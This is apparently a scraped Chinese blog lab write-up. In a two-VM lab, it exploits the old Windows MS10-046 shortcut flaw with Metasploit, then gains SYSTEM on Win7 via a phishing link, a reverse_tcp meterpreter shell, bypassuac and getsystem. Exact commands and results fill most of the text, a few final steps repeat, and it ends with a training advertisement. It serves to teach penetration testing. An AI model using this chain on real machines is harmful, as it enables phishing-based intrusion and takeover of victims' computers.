网站建设 账务处理,宾馆网站制作,win2008iis7配置网站,设计家官网视频本实验实现1 #xff1a;要生成一个钓鱼网址链接#xff0c;诱导用户点击#xff0c;实验过程是让win7去点击这个钓鱼网站链接#xff0c;则会自动打开一个文件共享服务器的文件夹#xff0c;在这个文件夹里面会有两个文件#xff0c;当用户分别点击执行后#xff0c;则… 本实验实现1 要生成一个钓鱼网址链接诱导用户点击实验过程是让win7去点击这个钓鱼网站链接则会自动打开一个文件共享服务器的文件夹在这个文件夹里面会有两个文件当用户分别点击执行后则会主动连接到发起攻击的主机上即可攻击成功 本实验实现2 攻击成功后想要从kali上传文件到win7中后发现权限不够的问题则进行提权操作后成功上传文件 在VMware上建立两个虚拟机win7和kali
Kali它是Linux发行版的操作系统它拥有超过300个渗透测试工具就不用自己再去找安装包去安装到我们自己的电脑上了毕竟自己从网上找到也不安全。它甚至还集成了600多种黑客工具很强大。
可以永久免费使用基本上学黑客攻击必会用到这个系统
靶机Win7 64位 IP: 192.168.10.36–用ipconfig进行查询
攻击机Kali 64位 IP192.168.10.21–用ifconfig进行查询 1 、实验环境前提条件
win7中关闭防火墙“打开网络和共享中心”-“Windows防火墙”-“打开或关闭Windows防火墙”-均选择关闭选项
保证两个虚拟机是可以ping通的尤其是在kali中去ping win7看能否连通
ping 192.168.10.362 、打开 Metasploit 渗透工具
Metasploit是一款开源的安全漏洞检测工具msfconsole用于启动msf终端
msfconsole结果成功进入进入到msf6“的模式下 3 、查看需要利用的漏洞
搜索漏洞编号为ms10-046
【 补充 Windows系统漏洞微软的漏洞编号命名格式为MS10-046
MS Micosoft的缩写固定格式 10 表示年份即2010年发布的漏洞 046 表示顺序即当年度发布的第46个漏洞。
search ms10-046结果可以看到返回了多条可利用的漏洞模块信息 4、尝试利用其中一个漏洞模块进行攻击
利用其中一个漏洞攻击模块-0模块进行攻击进入模块中 注意 必须是“_”不是“-”否则会报错
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader结果成功切换到这个模块之下–”msf6 exploit(windows/browser/ms10_046_shortcut_icon_dllloader)“
并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”–没有配置payload默认为 windows/meterpreter/reverse_tcp 5、查看该漏洞模块所需的参数情况
进到这个漏洞模块之后先查看该测试模块的参数情况。类似于你使用一软件进行攻击是不是需要先进行一些简单的参数配置啊需要告诉软件要向谁发起攻击吧这是最最基本的所以要配置就要先查看都可以配置哪些参数
show options结果其中required显示的值为yes的代表是必须要设置的项显示的值为no的代表是不必须要设置的项
重点关注5个参数配置需要设置哪个就设置哪个 Payload(攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) SRVHOST(文件共享服务器-kali地址) SRVPORT(文件共享服务器的端口-使用默认获取的端口即可) LHOST(发起攻击的地址-kali地址) LPORT(发起攻击的端口-使用默认获取的端口即可) 【 补充说明
1Payload中包含有需要在远程系统中运行的恶意代码Payload是一种特殊模块它们能够以漏洞利用模块运行并能够利用目标系统中的安全漏洞实施攻击。也就是说漏洞利用模块可以访问目标系统而其中的代码定义了Payload在目标系统中的行为。
2Payload模块主要有以下三种类型-Single -Stager -Stage Single是一种完全独立的Payload实现的目的也简单但容易被捕捉到。 Stager这种Payload负责建立目标用户与攻击者之间的网络连接并下载额外的组件或应用程序。 一种常见的Stagers Payload就是reverse_tcp它可以让目标系统与攻击者建立一条tcp连接3次握手-4次挥手是一个基于TCP的反向链接反弹shell, 使用起来很稳定。 Stage是Stager Payload下载的一种Payload组件这种Payload可以提供更加高级的功能而且没有大小限制。 3windows/x64/meterpreter/reverse_tcp则由一个Stager Payloadreverse_tcp和一个Stage Payloadmeterpreter组成。
【注意 Payload 为 windows/meterpreter/reverse_tcp 默认获取到的控制通道 meterpreter 为 32 位
如果想将之后获取到的控制通道 meterpreter 改为 64 位则设置 payload:windows/x64/meterpreter/reverse_tcp 】 6、设置文件共享服务器
发现仅SRVHOST为空待设置其它payload/SRVPORT/LHOST/LPORT均已获取且正确设置SRVHOST的对应的参数地址它指的是文件共享服务器的地址想一想要设成谁为什么
分析一下是在哪里用到这个文件共享服务器是不是会在生成一个钓鱼网址诱导用户点击了就会自动给它打开一个文件共享服务器文件夹啊我们在这用。那你们觉得应该是谁生成这个文件夹呢是用户那边么还是攻击者这边肯定是攻击者这边吧我们是不知道会有谁点了这个钓鱼网站链接吧
所以我们才会对这个文件共享服务器的地址设置为kali的地址
set SRVHOST 192.168.10.217、再次进行检查
show options8、检查无误后发起攻击
run结果生成一个钓鱼网站的链接“Using URL : http://192.168.10.21:80/“开启服务等待有人点击该钓鱼网站链接 9、打开钓鱼网站链接
到win7中在IE浏览器中打开钓鱼网站链接http://192.168.10.21:80/会自动打开文件共享服务器文件夹文件夹中会生成两个文件尝试去双击打开“MISvnxTX”快捷方式的文件即可触发会话连接
结果1在win7中打开该快捷方式的文件后不会有任何的反馈结果 结果2由于在win7中触发打开了快捷方式的文件那么在kali中则会被触发会话连接结果显示了是192.168.10.36尝试点击了钓鱼网站链接并利用ms10-046漏洞模块对目标主机发起了攻击最终“meterpreter session 1 opened”–表明已经开通192.168.10.21:4444和192.168.10.36:49195会话连接1 10 、手动连接会话进入控制通道
一旦开通一个会话连接后若系统没有自动进入控制通道则进行手动连接
10.1手动查看当前存在的会话
注意在目录msf下手动查看当前存在的会话
结果当前只有会话连接1meterpreter建立的连接类型type是x84– 32位的由模块中的payload设定以及展示目标主机192.168.10.36的基本信息和连接信息
sessions10.2选择连接当前已经开通的会话1并进入控制通道meterpreter交互模式表明攻击成功
sessions -i 111、实现上传文件
在控制通道中从kali主机中上传一个文件到win7中C盘根目录下前提在kali的主文件夹中新建1.txt目录则是/home/kali/1.txt使用的命令是upload
11.1正常使用上传文件的命令upload
meterpreterupload /home/kali/1.txt c:\如果不能立马发聩结果的话一般要手动回车两次即可得到结果但反馈结果提示错误信息
“operation failed:access is denied”----操作失败: 访问被拒绝 11.2分析错误的原因
1先考虑是不是命令书写不对的啊如果故意将命令书写不对应该得到的提示是“运行命令上传错误: 没有这样的文件或目录rb _ file _ s _ stat-/home/kal/1. txror”
meterpreterupload /home/ka/1.txt c:\ 结果“NO such file or directory…”–没有这样的文件或目录明显和“访问被拒绝”不一样所以可以得到上述错误不是书写不对的问题。 2那这就要考虑访问被拒绝是不是权限上的问题一般来说权限够的话命令是不应该被拒绝所以要考虑提权的问题。
【 补充
windows系统中用户权限 user【普通用户-张三】 administrator【管理员用户】 system【系统用户、虽不可登录最高权限但对系统有完整的控制权】 Linux系统中用户权限 user【普通用户】 root【超级用户】 11.3提权
用于提权有个常用的命令getsystem命令
meterpretergetsystem结果提示提权失败“priv_elevate_getsystem: operation failed:this function is not supported on this system. the following was attempted:” ----操作失败: 该系统不支持此函数 11.4为什么会提权失败呢
首先我们要知道Windows vista系统2005年微软开发的一款个人桌面操作系统07年正式出售使用12年终止它的主流技术支持17年终止其的一切支持是微软比较早的一个系统版本。它是在windowsXP和win7之间的一个过渡性系统明显win7是晚于vista系统开发的
在晚于vista以后的系统中增加了一个UAC的功能user access control- 用户账户控制这个功能会对管理员组的用户起到一定的限制作用目的是为了保护计算机的安全。也就是说当我们需要运行一些重要的程序时比如只有管理员权限才能运行的程序时UAC功能就会弹出一个对话框对用户进行询问只有用户点击了同意按钮程序才会以管理员或者system权限去运行。
因此我们要想提权成功首先要绕过windows的UAC限制然后使用getsystem命令进行提权即可接下来我们可以使用常用的绕过UAC的套路- bypassuac模块进行绕过UAC限制
12、使用bypassuac模块绕过UAC限制
12.1 查看当前权限
以上都是我们的分析认为是权限的问题那我们就来验证一下吧看当前的权限到底是不是普通的权限啊不是最高权限-system。进行当前权限的查看。
而且即便没有以上这些问题的话我们也要认清一个事实就是在获得了session后说明建立了至少一个会话了我们可以通过连接会话来获取控制通道meterpreter但注意这并不意味着我们就可以为所欲为了必然是会有一个权限的问题一般不会一上来就能获得最高的权限所以会有两种情况获得system最高权限或者是普通用户权限
meterpretergetuid结果查看当前获得的用户的权限只是普通用户权限”18044“不是最高权限system 12 .2 挂起当前会话
由于bypassuac模块是利用已有的会话连接绕过UAC限制最终会获得一个新的会话连接所以它的前提是要成功开启一个会话连接并保留下来且不可以断开连接exit以供使用所以可以利用background进行返回将攻击成功以后给我们返回的控制通道meterpreter 后台挂起将当前的session会话1放入后台
meterpreterbackground结果成功将session会话1挂起到后台并没有断开连接且成功切换到msf 目录下 12.3 使用bypassuac 模块绕过UAC **限制查看需要利用的漏洞 **
search bypassuac结果可以看到返回了多条可利用的漏洞模块信息 12.4尝试利用其中一个漏洞模块进行攻击
利用其中一个漏洞攻击模块-02模块进行攻击进入模块中 注意 必须是“_”不是“-”否则会报错
use exploit/windows/local/bypassuac结果成功切换到这个模块之下–”msf6 exploit(windows/local/bypassuac)“
并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”–没有配置payload默认为 windows/meterpreter/reverse_tcp 12.5查看该漏洞模块的参数情况
进到这个漏洞模块之后先查看该测试模块的参数情况
show options结果展示其中required显示的值为yes的代表是必须要设置的项显示的值为no的代表是不必须要设置的项
重点关注4个参数配置需要设置哪个就设置哪个 Payload(攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) SESSION(已开启的会话连接) LHOST(发起攻击的地址-kali地址) LPORT(发起攻击的端口-使用默认获取的端口即可) 12.6设置已开启的会话连接
其它payload/LHOST/LPORT均已获取且正确。
发现仅SESSION为空待设置需要设置提示“the session to run this module on”-“运行此模块的会话”我们肯定要设置一个已有的会话号吧若是没有的会话设置它也没法用所以参数SESSION指的是已开启的会话连接应设置成我们已有的session连接会话1被我们挂起放在后台了
set SESSION 112.7再次进行检查
show options12.8检查无误后发起攻击
run结果显示利用bypassuac漏洞模块对目标主机发起了攻击成功绕过UAC限制“meterpreter session 2 opened”–表明已经开通了192.168.10.21:4444和192.168.10.36:49199的新会话连接2 13 、手动连接会话进入控制通道
一旦开通一个新的会话连接后系统没有自动返回控制通道进行手动连接
13.1手动查看当前存在的会话
注意在目录msf下结果显示会话连接1和新生成的会话连接2meterpreter建立的连接类型type是x84– 32位的由模块中的payload设定以及展示目标主机192.168.10.36的基本信息和连接信息
sessions13.2选择连接当前已经开通的新会话2并进入控制通道meterpreter交互模式表明攻击成功
【 注意 就不要再连接会话1了我们之前已经试过连接1到控制通道发现因权限不够而提权失败。所以要选择连接会话2这是我们利用bypassuac模块绕过UAC功能开启的新的会话连接肯定要进到该会话中才能实现成功提权的目的】
sessions -i 214 、查看当前权限并进行提权
14.1进入控制通道后先查看当前获得的用户的权限
meterpretergetuid结果发现还只是普通用户权限不是最高权限system 14.2再次提权
理论上我们是通过bypassuac模块获取的该权限应已绕过了UAC限制可以成功进行提权操作。用常用的提权命令getsystem命令
meterpretergetsystem结果“got system” —提示提权成功 14.3再次查看当前获得的权限
meterpretergetuid结果获取了最高权限system 15、再次上传文件
提权成功后就可以用upload进行文件的上传从kali传送到win7的C盘下
meterpreterupload /home/kali/1.txt c:\结果1成功将kali中的1.txt上传到win7的C盘根目录下 结果2在win7中c盘根目录下发现传过来的1.txt文档 [外链图片转存中…(img-FBOaAQxD-1676903857541)]
14.3再次查看当前获得的权限
meterpretergetuid结果获取了最高权限system
[外链图片转存中…(img-0x2Rvh8N-1676903857541)]
15、再次上传文件
提权成功后就可以用upload进行文件的上传从kali传送到win7的C盘下
meterpreterupload /home/kali/1.txt c:\结果1成功将kali中的1.txt上传到win7的C盘根目录下
[外链图片转存中…(img-g21JMN6z-1676903857541)]
结果2在win7中c盘根目录下发现传过来的1.txt文档
[外链图片转存中…(img-Kul0h2Fz-1676903857542)]
最后
分享一个快速学习【网络安全】的方法「也许是」最全面的学习方法 1、网络安全理论知识2天 ①了解行业相关背景前景确定发展方向。 ②学习网络安全相关法律法规。 ③网络安全运营的概念。 ④等保简介、等保规定、流程和规范。非常重要
2、渗透测试基础一周 ①渗透测试的流程、分类、标准 ②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking ③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察 ④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础一周 ①Windows系统常见功能和命令 ②Kali Linux系统常见功能和命令 ③操作系统安全系统入侵排查/系统加固基础
4、计算机网络基础一周 ①计算机网络基础、协议和架构 ②网络通信原理、OSI模型、数据转发流程 ③常见协议解析HTTP、TCP/IP、ARP等 ④网络攻击技术与网络安全防御技术 ⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作2天 ①数据库基础 ②SQL语言基础 ③数据库安全加固
6、Web渗透1周 ①HTML、CSS和JavaScript简介 ②OWASP Top10 ③Web漏洞扫描工具 ④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等 恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k。
到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗
想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取 扫下方二维码免费领取
有了这些基础如果你要深入学习可以参考下方这个超详细学习路线图按照这个路线学习完全够支撑你成为一名优秀的中高级网络安全工程师
高清学习路线图或XMIND文件点击下载原文件
还有一些学习中收集的视频、文档资源有需要的可以自取 每个成长路线对应板块的配套视频 当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。 因篇幅有限仅展示部分资料需要的可以【扫下方二维码免费领取】